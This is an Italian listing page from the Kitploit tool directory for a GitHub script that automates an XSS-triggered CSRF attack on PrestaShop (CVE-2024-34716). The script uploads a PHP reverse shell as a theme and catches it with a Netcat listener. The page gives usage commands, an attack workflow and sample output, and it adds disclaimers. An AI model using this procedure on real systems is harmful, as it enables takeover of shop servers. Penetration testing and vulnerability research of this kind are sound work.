Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Prestashop-CVE-2024-34716 — Automatizza un attacco CSRF contro CVE-2024-34716 per distribuire una reverse shell PHP su PrestaShop, con packaging automatico del payload e configurazione del listener Netcat. | Kitploit
Strumenti/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Generazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

Automatizza un attacco CSRF contro CVE-2024-34716 per distribuire una reverse shell PHP su PrestaShop, con packaging automatico del payload e configurazione del listener Netcat.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1111 anno faNon ancora revisionato
Condividi

Script di Exploit per Attacco CSRF e Reverse Shell

Questo script automatizza un exploit CSRF (Cross-Site Request Forgery) per caricare una reverse shell PHP sul web server di un target ed eseguirla. La reverse shell viene fornita come file ZIP tramite un payload CSRF appositamente creato, che viene attivato quando un utente privilegiato interagisce con un endpoint specifico. Lo script richiede un'istanza Netcat in ascolto per catturare la connessione della reverse shell.

Sembra rotto per ora, sarà aggiornato in seguito

Requisiti

  • Netcat: Assicurati che Netcat sia installato e possa rimanere in ascolto su una porta specificata (default: 9001).
  • Python 3: Utilizzato per servire file tramite HTTP.
  • Curl e JQ: Utilizzati per inviare e gestire richieste HTTP e analisi JSON.

Utilizzo

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Argomenti

  • target_url: URL di base del target (es. https://example.com).
  • admin_endpoint: Percorso verso l'endpoint di importazione del tema admin.
  • admin_email: Indirizzo email di un amministratore (da spoofare per il payload).
  • attacker_ip: Indirizzo IP dove il listener della reverse shell riceverà la connessione.

Esempio

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

Flusso di Lavoro dell'Exploit

  1. Creazione della Reverse Shell: Genera una reverse shell PHP utilizzando revshells.com con l'attacker_ip e la porta 9001 forniti.
  2. Pacchettizzazione ZIP: Lo script della reverse shell (love.php) viene compresso in Love-exploit.zip.
  3. Recupero del Token CSRF: Recupera il token CSRF dal target per autorizzare la richiesta di importazione del tema.
  4. Costruzione del Payload HTML: Costruisce un payload HTML (csrf_payload.html) contenente uno script JavaScript per inviare automaticamente una richiesta malevola al pannello admin del target per importare la reverse shell.
  5. Impostazione del Server HTTP: Un server HTTP temporaneo sulla porta 8000 serve Love-exploit.zip per l'importazione da parte del target.
  6. Caricamento XSS e Attivazione CSRF: Il payload CSRF viene caricato sulla pagina dei contatti del target. Quando viene acceduto, attiva l'attacco CSRF.
  7. Listener della Reverse Shell: L'attaccante monitora le connessioni in arrivo dalla vittima utilizzando Netcat.

Passaggi di Esecuzione

  1. Avvia un listener Netcat sulla tua macchina:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Esegui lo script:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. Aspetta che il target esegua il payload CSRF e ricevi la connessione della reverse shell.

Output

Lo script fornisce le seguenti informazioni durante l'esecuzione:

  • Stato del recupero del token CSRF.
  • Stato della creazione e pacchettizzazione della reverse shell.
  • Stato della consegna del payload e stato del server HTTP.

Note Importanti

  • Permessi: Questo script richiede l'autorizzazione per essere eseguito sul server target. L'uso non autorizzato è illegale e punibile per legge.
  • Ambiente di Test: Utilizzare solo in un ambiente controllato e autorizzato, come un laboratorio di cybersecurity.
  • Conflitti di Porta: Assicurati che le porte 8000 (server HTTP) e 9001 (listener Netcat) siano libere prima di eseguire lo script.

Esempio di Output

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

Questo documento è destinato all'uso da parte di penetration tester e ricercatori di cybersecurity in ambienti controllati. L'uso improprio di questo strumento per scopi non autorizzati è strettamente proibito.


Disclaimer

Questo script è solo a scopo educativo e per valutazioni legali di cybersecurity. L'uso non autorizzato contro un sistema senza permesso è illegale e contrario alle linee guida etiche.

Scarica lo strumento